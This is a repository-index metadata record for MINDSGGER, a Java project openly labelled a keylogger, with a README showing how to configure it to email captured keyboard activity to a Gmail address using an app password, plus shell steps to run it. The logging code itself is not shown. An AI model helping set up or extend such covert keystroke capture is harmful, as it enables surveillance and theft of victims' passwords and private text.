{"id":26879643,"url":"https://github.com/pineberrycode/mindsgger","last_synced_at":"2026-05-07T11:33:47.540Z","repository":{"id":210037284,"uuid":"675901988","full_name":"PineberryCode/MINDSGGER","owner":"PineberryCode","description":"[🦠,  👾] Keylogger","archived":false,"fork":false,"pushed_at":"2024-02-03T20:53:55.000Z","size":35,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"dev","last_synced_at":"2025-03-31T13:36:05.677Z","etag":null,"topics":["gmail","java","keylogger","lombok-maven","shell"],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/PineberryCode.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2023-08-08T02:05:49.000Z","updated_at":"2023-12-10T06:13:37.000Z","dependencies_parsed_at":"2023-12-17T03:33:33.373Z","dependency_job_id":"529395a2-100a-45e8-a35c-a53aa0cb8332","html_url":"https://github.com/PineberryCode/MINDSGGER","commit_stats":null,"previous_names":["pineberrycode/mindsgger"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/PineberryCode/MINDSGGER","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/PineberryCode%2FMINDSGGER","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/PineberryCode%2FMINDSGGER/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/PineberryCode%2FMINDSGGER/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/PineberryCode%2FMINDSGGER/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/PineberryCode","download_url":"https://codeload.github.com/PineberryCode/MINDSGGER/tar.gz/refs/heads/dev","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/PineberryCode%2FMINDSGGER/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32735204,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-07T02:14:30.463Z","status":"ssl_error","status_checked_at":"2026-05-07T02:14:29.405Z","response_time":62,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["gmail","java","keylogger","lombok-maven","shell"],"created_at":"2025-03-31T13:31:10.314Z","updated_at":"2026-05-07T11:33:47.525Z","avatar_url":"https://github.com/PineberryCode.png","language":"Java","funding_links":[],"categories":[],"sub_categories":[],"readme":"# MINDSGGER\n\nThis is an app that provides information about the activities of a device (specifically the keyboard).\n\nPre-requisite:\n- Create an App Gmail password\n\n\u003e [!NOTE]\n\u003e Set up the **INACTIVITY_TIMEOUT** value to your preference: [/src/main/java/my/model/Person.java](https://github.com/PineberryCode/MINDSGGER/tree/dev/src/main/java/my/model/Person.java)\n```JAVA\n/*...*/\n// Variable to store the time in milliseconds.\nprotected long INACTIVITY_TIMEOUT = 1 * 3600 * 1000; // One hour\n/*...*/\n```\n\n\u003e [!IMPORTANT]\n\u003e Set up the input email (app gmail): [/src/main/java/my/controller/GmailFunctions.java](https://github.com/PineberryCode/MINDSGGER/tree/dev/src/main/java/my/controller/GmailFunctions.java)\n```JAVA\n/*...*/\npublic class GmailFunctions extends TXT {\n    \n    Gmail gmail;\n\n    public GmailFunctions () {\n        gmail = new Gmail();\n    }\n\n    private void bodyEmail () throws AddressException, MessagingException {\n        gmail.setEmailTo(\"mindlunnyfalse@gmail.com\"); // Set up =\u003e mindlunnyfalse@gmail.com\n    /*...*/\n```\n\n\u003e [!IMPORTANT]\n\u003e Remember to add a file that contains your App Gmail password in this route: [/src/main/java/my/key](https://github.com/PineberryCode/MINDSGGER/tree/dev/src/main/java/my/key)\n```JAVA\npackage my.key;\n\npublic class Param {\n    protected String passwordGMAILApp = \"[Your App Gmail password]\";\n}\n```\n\n## Steps just for Linux users:\n\n###### 1. Enable execute permission\n```SHELL\nchmod +x run.bash\n```\n###### 2. Reload (Optional)\n```SHELL\nsource ./run.bash\n```\n###### 3. Run\n```SHELL\n./run.bash\n```\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpineberrycode%2Fmindsgger","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fpineberrycode%2Fmindsgger","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpineberrycode%2Fmindsgger/lists"}